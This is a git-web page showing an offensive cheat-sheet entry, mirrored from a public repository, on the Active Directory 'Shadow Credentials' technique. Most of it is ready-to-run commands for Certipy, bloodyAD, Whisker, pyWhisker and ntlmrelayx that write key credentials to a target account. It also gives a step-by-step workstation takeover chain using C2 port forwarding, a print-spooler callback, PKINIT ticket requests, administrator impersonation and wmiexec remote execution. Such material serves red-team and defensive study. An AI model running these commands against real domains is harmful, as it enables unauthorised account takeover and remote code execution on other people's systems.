daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pwd-shadow-credentials.md (5884B)


      1 ---
      2 title: "Password - Shadow Credentials"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/pwd-shadow-credentials.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/pwd-shadow-credentials.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Password - Shadow Credentials
     12 
     13 > Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user.  When trying to pre-authenticate with PKINIT, the KDC will check that the authenticating user has knowledge of the matching private key, and a TGT will be sent if there is a match.
     14 
     15 :warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists
     16 
     17 **Requirements**:
     18 
     19 * Domain Controller on (at least) Windows Server 2016
     20 * Domain must have Active Directory `Certificate Services` and `Certificate Authority` configured
     21 * PKINIT Kerberos authentication
     22 * An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object
     23 
     24 **Exploitation**:
     25 
     26 * [ly4k/Certipy](https://github.com/ly4k/Certipy)
     27 
     28   ```ps1
     29   certipy shadow auto -account user -dc-ip 10.10.10.10 -dns-tcp -ns 10.10.10.10 -k -no-pass -target dc.domain.lab
     30   certipy shadow -u 'attacker@domain.local' -p 'Passw0rd!' -dc-ip '10.0.0.100' -account 'victim' add
     31   ```
     32 
     33 * [CravateRouge/bloodyAD](https://github.com/CravateRouge/bloodyAD):
     34 
     35   ```ps1
     36   bloodyAD --host 10.10.10.10 -u username -p 'P@ssw0rd' -d domain.lab add shadowCredentials targetpc$
     37   bloodyAD --host 10.10.10.10 -u username -p 'P@ssw0rd' -d domain.lab remove shadowCredentials targetpc$ --key <key from previous output>
     38   ```
     39 
     40 * [eladshamir/Whisker](https://github.com/eladshamir/Whisker):
     41 
     42   ```powershell
     43   # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
     44   Whisker.exe list /target:computername$
     45 
     46   # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
     47   Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password"
     48   Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1]
     49 
     50   # Removes a key credential from the target object specified by a DeviceID GUID.
     51   Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b
     52   ```
     53 
     54 * [ShutdownRepo/pyWhisker](https://github.com/ShutdownRepo/pyWhisker):
     55 
     56   ```ps1
     57   # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
     58   python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list"
     59 
     60   # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
     61   pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list"
     62   python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1"
     63 
     64   # Removes a key credential from the target object specified by a DeviceID GUID.
     65   python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e"
     66   ```
     67 
     68 ## Scenario
     69 
     70 ### Shadow Credential Relaying
     71 
     72 * Trigger an NTLM authentication from `DC01` (PetitPotam)
     73 * Relay it to `DC02` (ntlmrelayx)
     74 * Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker)
     75 * Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'`
     76 
     77 ### Workstation Takeover with RBCD
     78 
     79 **Requirements**:
     80 
     81 * `Print Spooler` service running
     82 * `WebClient service` running
     83 
     84 **Exploitation**:
     85 
     86 * Using your C2, start a reverse socks on port 1080: `socks 1080`
     87 * Enable port forward from port 8081 to 81 on the compromised machine:
     88 
     89   ```ps1
     90   rportfwd 8081 127.0.0.1 81
     91   ```
     92 
     93 * Start the relay:
     94 
     95   ```ps1
     96   proxychains python3 ntlmrelayx.py -t ldaps://dc.domain.lab --shadow-credentials --shadow-target target\$ --http-port 81
     97   ```
     98 
     99 * Trigger a callback on webdav:
    100 
    101   ```ps1
    102   proxychains python3 printerbug.py domain.lab/user:password@target.domain.lab compromised@8081/file
    103   ```
    104 
    105 * Use [dirkjanm/PKINIT](https://github.com/dirkjanm/PKINITtools) to get a TGT for the machine account:
    106 
    107   ```ps1
    108   proxychains python3 gettgtpkinit.py domain.lab/target\$ target.ccache -cert-pfx </path/from/previous/command.pfx> -pfx-pass <pfx-pass>
    109   ```
    110 
    111 * Elevate your privileges by creating a service ticket impersonating a local admin:
    112 
    113   ```ps1
    114   proxychains python3 gets4uticket.py kerberos+ccache://domain.lab\\target\$:target.ccache@dc.domain.lab cifs/target.domain.lab@domain.lab administrator@domain.lab administrator_target.ccache -v
    115   ```
    116 
    117 * Use your ticket:
    118 
    119   ```ps1
    120   export KRB5CCNAME=/path/to/administrator_target.ccache
    121   proxychains python3 wmiexec.py -k -no-pass domain.lab/administrator@target.domain.lab
    122   ```
    123 
    124 ## References
    125 
    126 * [Shadow Credentials: Workstation Takeover Edition - Matthew Creel - October 21, 2021](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition)
    127 * [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
    128 * [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - June 17, 2021](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)